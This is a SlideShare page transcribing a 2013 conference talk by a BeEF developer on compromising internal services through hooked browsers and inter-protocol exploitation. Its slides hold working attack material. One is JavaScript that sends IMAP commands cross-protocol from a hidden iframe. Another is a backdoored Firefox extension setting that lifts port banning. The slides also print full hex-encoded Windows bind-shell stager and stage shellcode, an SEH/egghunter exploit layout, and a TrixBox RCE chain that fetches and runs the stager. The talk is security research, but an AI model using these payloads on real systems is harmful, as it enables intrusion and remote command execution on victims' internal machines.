SlideShare a Scribd company logo

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

Michele Orru, profile picture
Michele Orru

This document discusses using the Browser Exploitation Framework (BeEF) and inter-protocol exploitation techniques to gain control of victim browsers. It begins with an overview of traditional browser attack vectors and their limitations. It then introduces BeEF and how it can be used to hook victim browsers through XSS and control them remotely with JavaScript. The document proposes revitalizing inter-protocol exploitation techniques to bypass cross-domain restrictions and allow executing commands on the victim's machine. It presents the design of a new BeEF Bind shellcode that sets up a web server to accept commands and control a process like cmd.exe on the victim internally without needing an outbound connection.

Technology
1 of 41
Downloaded 79 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Rooting your internals: custom shellcode, BeEF and Inter-protocol exploitation antisnatchor HackPra AllStars 2013
About myself •Co-author of Browser Hacker’s Handbook (now on pre-order from Amazon.co.uk, available February/March 2014) •BeEF lead core developer •Application Security researcher •Ruby, Javascript, OpenBSD and BlackMetal fan
• Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and... About The Talk
• Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive Current situation traditional browser attack vectors
• Is the victims web browser patched? • Do you have $100k to spend on a single 0-day (weaponized) browser exploit? • How many times can you re-use your 0day for targeted attacks before it will be detected, reversed and patched? • How many useful browser exploits are available? Current situation Browser vulnerability exploitation
• Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • most latest browsers don’t leak anymore exact plugin info (except for Firefox, thanks Mozilla) • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome) • From Java 7 even unsigned applets require explicit user intervention to run! (see Immunity bypass - now patched) Current situation Browser plugin exploitation
• Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, wait sorry, also stealing cookies... Current situation Cross Site Scripting
Current situation traditional browser attack vectors Internal server vulnerabilities are sitting there bored and lonely...
• Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. The scary BeEF changing browser attack vectors
• Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • AntiVirus? Fuck that, it’s not going to detect BeEF • Features like ManInTheBrowser,Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript The scary BeEF changing browser attack vectors
Idea flow read top to bottom Michele: Awesome, let me do some research and lets port it to BeEF Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer
• Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed asVALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS Revitalizing IPEC Inter-Protocol Exploitation
Revitalizing IPEC Inter-Protocol Exploitation: IMAP var server = '172.16.37.151'; var port = '143'; var commands = 'a01 login root passwordna002 logout'; var target = "http://" + server + ":" + port + "/abc.html"; var iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('name', 'data'); form.setAttribute('action', target); form.setAttribute('method', 'post'); form.setAttribute('enctype', 'text/plain'); var input = document.createElement('input'); input.setAttribute('id', 'data1') input.setAttribute('name', 'data1') input.setAttribute('type', 'hidden'); input.setAttribute('value', commands); form.appendChild(input); iframe.contentWindow.document.body.appendChild(form); form.submit();
• Limitations: • SOP and cross-domain restrictions • Port Banning (damn you!) • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? NOPE :D Revitalizing IPEC Inter-Protocol Exploitation: limitations
• Limitations: • SOP and cross-domain restrictions •PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 1 On all browsers (except Opera) we can ‘blindly’ send data cross-origin with XHR, without the need to read HTTP responses. This is (usually) enough to pwn services.
• Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 http://xyz.com:143/ FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED Connection to various known port (22/25/143/993/995/etc..) denied. On Firefox, an extension can override config options:
• Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Trick the victim to install a backdoor’ed Firefox extension.The pref.js file of the extension contains: // PortBanning override pref("network.security.ports.banned.override", "20,21,22,25,110,143");
• Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Only about 60 TCP ports are prohibited by Port Banning -> 65465 are allowed :D 220 - imap3 (only IE blocks it :-) 6667 - IRC (Firefox/IE only) 9100 - jetdirect 10000 - ExtraNET you name it: HP OpenView, Java RMI stuff, etc..
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 Lots of HTTP headers are automatically created by the browser (around 400 bytes). Most of them cannot be overridden, and cross-domain they are even bigger. We can override some of them:
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 We can save other 100 bytes overriding the UserAgent through the Firefox extension: pref("general.useragent.override", "Firefox/15.0.1");
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 4 The original IPEC paper was using: Content-Type: multipart/form-data; Our approach uses, to save space: Content-Type: text/plain;
• Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 5 Not anymore, thanks to the BeEF Bind shellcode. You have a bind shellcode which can be totally controlled through an hooked browser sitting in the same victim internal network.
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
High Level Architecture from FF extension to command execution
28 BeEF Bind shellcode how it works • Ty Miller created a new staging Windows shellcode, which we called BeEF Bind • He was bored of reverse shells :D • stager -> 299 bytes (326 after bad-char encoding) • stage -> 792 bytes • The stager sets up a bind port on 4444/TCP to accept an HTTP POST request containing the raw stage in a parameter called ‘cmd’. var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + "x37x96x26x84";
29 BeEF Bind shellcode how it works • The stage sets up a bind port on 4444/TCP to accept HTTP POST requests from the web browser. • Set of pipes to redirect the cmd.exe input and output. This allows to jump in the middle of the HTTP request and the cmd.exe process to implement the web server style functionality. • The command result output is returned with the Access-Control-Allow-Origin: * header. After the stage is deployed, SOP is not a problem anymore. var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + "xfexffxff";
• Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support sendAsBinary, prototype overriding on XHR object. BeEF Bind shellcode delivery and usage from within BeEF if (!XMLHttpRequest.prototype.sendAsBinary) { XMLHttpRequest.prototype.sendAsBinary = function (sData) { var nBytes = sData.length, ui8Data = new Uint8Array(nBytes); for (var nIdx = 0; nIdx < nBytes; nIdx++) { ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff; } this.send(ui8Data); };} Stager - Stage
• We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized and the exploit becomes reliable. BeEF Bind shellcode delivery and usage from within BeEF
• Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter BeEF Bind shellcode delivery and usage from within BeEF
BeEF Bind shellcode delivery and usage from within BeEF Immunity DBG view: IMAP process memory when sending the stager
BeEF Bind shellcode delivery and usage from within BeEF Wireshark view: exploit with shellcode stager Wireshark view: command delivery and results
35 BeEF Bind shellcode delivery and usage from within BeEF Ultimate fun. BeEF IPEC shell (JS) exec command get results set target
Demo fun from phishing to internal IMAP server compromise
• Bart Leppens ported the Win32 BeEF Bind shellcode to Linux • Great to be used as shellcode for normal Linux exploits • Great to be used as a binary with any Remote Command Execution • TrixBox <= 2.6.1 pre-auth RCE example with BeEF Bind Linux • Exploit here (through normal sockets, not from the browsers): http://www.exploit-db.com/exploits/6026/ BeEF Bind shellcode delivery and usage from within BeEF
• Identify TrixBox in the hooked browser internal network (BeEF “internal_network_fingerprinting”module) • Get the current PHPSESSID, needed to trigger the malicious PHP code that will be leaving in PHP’s $_SESSION object • The attack vector downloads the BeEF Bind shellcode stager and executes it • Last step is send to the stager bind port the Stage contents • You’re now ready to send commands and get results from the hooked browser BeEF Bind shellcode delivery and usage from within BeEF
Demo fun TrixBox RCE exploitation from the browser
• Wade and the other BeEF guys • Ty and Bart for their awesome shellcodes • Mario and the other awesome speakers • If you want to support BeEF, buy our book. 50% of royalties will be used exclusively for the BeEF project (no joke)! • http://www.amazon.co.uk/Browser-Hackers-Handbook- Wade-Alcorn/dp/1118662091/ Thanks
Questions?

More Related Content

PDF
I'm the butcher would you like some BeEF
Michele Orru
 
PDF
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
PDF
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
PDF
Dark Fairytales from a Phisherman
Michele Orru
 
PDF
Buried by time, dust and BeEF
Michele Orru
 
PDF
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
PDF
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
PDF
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
I'm the butcher would you like some BeEF
Michele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
Dark Fairytales from a Phisherman
Michele Orru
 
Buried by time, dust and BeEF
Michele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 

What's hot (20)

PDF
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
PPTX
WordPress security for everyone
Vladimír Smitka
 
PPTX
Anthony Somerset - Site Speed = Success!
WordCamp Cape Town
 
PDF
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
PDF
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
PPTX
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
PPTX
WordPress performance tuning
Vladimír Smitka
 
PPTX
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
PPTX
Domino Security - not knowing is not an option (2016 edition)
Darren Duke
 
PDF
Improve WordPress performance with caching and deferred execution of code
Danilo Ercoli
 
PDF
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
PDF
Mobile Hybrid Development with WordPress
Danilo Ercoli
 
PDF
WordPress Development Tools and Best Practices
Danilo Ercoli
 
PPT
Roy foubister (hosting high traffic sites on a tight budget)
WordCamp Cape Town
 
PPTX
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
PDF
Secure Your Wordpress
n|u - The Open Security Community
 
PPTX
Php push notifications
Mohammed Shurrab
 
PDF
A @textfiles approach to gathering the world's DNS
Rob Fuller
 
PDF
NotaCon 2011 - Networking for Pentesters
Rob Fuller
 
PPT
Bypass file upload restrictions
Mukesh k.r
 
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
WordPress security for everyone
Vladimír Smitka
 
Anthony Somerset - Site Speed = Success!
WordCamp Cape Town
 
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
WordPress performance tuning
Vladimír Smitka
 
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Domino Security - not knowing is not an option (2016 edition)
Darren Duke
 
Improve WordPress performance with caching and deferred execution of code
Danilo Ercoli
 
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
Mobile Hybrid Development with WordPress
Danilo Ercoli
 
WordPress Development Tools and Best Practices
Danilo Ercoli
 
Roy foubister (hosting high traffic sites on a tight budget)
WordCamp Cape Town
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
Secure Your Wordpress
n|u - The Open Security Community
 
Php push notifications
Mohammed Shurrab
 
A @textfiles approach to gathering the world's DNS
Rob Fuller
 
NotaCon 2011 - Networking for Pentesters
Rob Fuller
 
Bypass file upload restrictions
Mukesh k.r
 
Ad

Viewers also liked (20)

PDF
Advances in BeEF - AthCon2012
Michele Orru
 
PPTX
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
PDF
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
 
PDF
Linux Shellcode disassembling
Harsh Daftary
 
ODP
Design and implementation_of_shellcodes
Amr Ali
 
PDF
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
 
PDF
Shellcode and heapspray detection in phoneyc
Z Chen
 
PPTX
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
PPTX
Java Shellcode Execution
Ryan Wincey
 
PPTX
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
 
PDF
Talking about exploit writing
sbha0909
 
PPTX
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
 
PDF
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
 
PPTX
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
 
PDF
Shellcode Analysis - Basic and Concept
Julia Yu-Chin Cheng
 
PPTX
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
PDF
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
 
PPT
Software Exploits
KevinCSmallwood
 
PDF
Shellcode injection
Dhaval Kapil
 
PDF
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Advances in BeEF - AthCon2012
Michele Orru
 
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
 
Linux Shellcode disassembling
Harsh Daftary
 
Design and implementation_of_shellcodes
Amr Ali
 
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
 
Shellcode and heapspray detection in phoneyc
Z Chen
 
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Java Shellcode Execution
Ryan Wincey
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
 
Talking about exploit writing
sbha0909
 
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
 
Shellcode Analysis - Basic and Concept
Julia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
 
Software Exploits
KevinCSmallwood
 
Shellcode injection
Dhaval Kapil
 
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Ad

Similar to Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF (20)

PDF
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
PDF
Antisnatchor all you ever wanted to know about beef
DefconRussia
 
PPTX
Beef saurabh
Saurav Chaudhary
 
PDF
If You Tolerate This, Your Child Processes Will Be Next
Bart Leppens
 
PDF
DeepSec2011_GroundBeEF
Michele Orru
 
PPTX
Advanced Client Side Exploitation Using BeEF
1N3
 
PDF
BeEF
AlexandraLacatus
 
PDF
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
PDF
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
ODP
Browser Exploitation Framework Tutorial
imlaurel2
 
PDF
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
PDF
Browser Exploit Framework
n|u - The Open Security Community
 
PPTX
Browser exploit framework
Prashanth Sivarajan
 
PDF
White Lightning Sept 2014
Bryce Kunz
 
PDF
ZN27112015
Denis Kolegov
 
PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
PDF
Burp suite
Yashar Shahinzadeh
 
PDF
DEF CON 23 - Xntrik - hooked browser meshed networks with webRTC and BeEF
Felipe Prado
 
PPTX
TSC Summit #4 - Howto get browser persitence and remote execution (JS)
Mikal Villa
 
PPTX
How to hide your browser 0-day @ Disobey
Zoltan Balazs
 
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
Antisnatchor all you ever wanted to know about beef
DefconRussia
 
Beef saurabh
Saurav Chaudhary
 
If You Tolerate This, Your Child Processes Will Be Next
Bart Leppens
 
DeepSec2011_GroundBeEF
Michele Orru
 
Advanced Client Side Exploitation Using BeEF
1N3
 
BeEF
AlexandraLacatus
 
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
Browser Exploitation Framework Tutorial
imlaurel2
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
Browser Exploit Framework
n|u - The Open Security Community
 
Browser exploit framework
Prashanth Sivarajan
 
White Lightning Sept 2014
Bryce Kunz
 
ZN27112015
Denis Kolegov
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
Burp suite
Yashar Shahinzadeh
 
DEF CON 23 - Xntrik - hooked browser meshed networks with webRTC and BeEF
Felipe Prado
 
TSC Summit #4 - Howto get browser persitence and remote execution (JS)
Mikal Villa
 
How to hide your browser 0-day @ Disobey
Zoltan Balazs
 

Recently uploaded (20)

PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
KodekX | Application Modernization Development
KodekX
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

  • 1. Rooting your internals: custom shellcode, BeEF and Inter-protocol exploitation antisnatchor HackPra AllStars 2013
  • 2. About myself •Co-author of Browser Hacker’s Handbook (now on pre-order from Amazon.co.uk, available February/March 2014) •BeEF lead core developer •Application Security researcher •Ruby, Javascript, OpenBSD and BlackMetal fan
  • 3. • Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and... About The Talk
  • 4. • Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive Current situation traditional browser attack vectors
  • 5. • Is the victims web browser patched? • Do you have $100k to spend on a single 0-day (weaponized) browser exploit? • How many times can you re-use your 0day for targeted attacks before it will be detected, reversed and patched? • How many useful browser exploits are available? Current situation Browser vulnerability exploitation
  • 6. • Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • most latest browsers don’t leak anymore exact plugin info (except for Firefox, thanks Mozilla) • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome) • From Java 7 even unsigned applets require explicit user intervention to run! (see Immunity bypass - now patched) Current situation Browser plugin exploitation
  • 7. • Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, wait sorry, also stealing cookies... Current situation Cross Site Scripting
  • 8. Current situation traditional browser attack vectors Internal server vulnerabilities are sitting there bored and lonely...
  • 9. • Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. The scary BeEF changing browser attack vectors
  • 10. • Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • AntiVirus? Fuck that, it’s not going to detect BeEF • Features like ManInTheBrowser,Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript The scary BeEF changing browser attack vectors
  • 11. Idea flow read top to bottom Michele: Awesome, let me do some research and lets port it to BeEF Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer
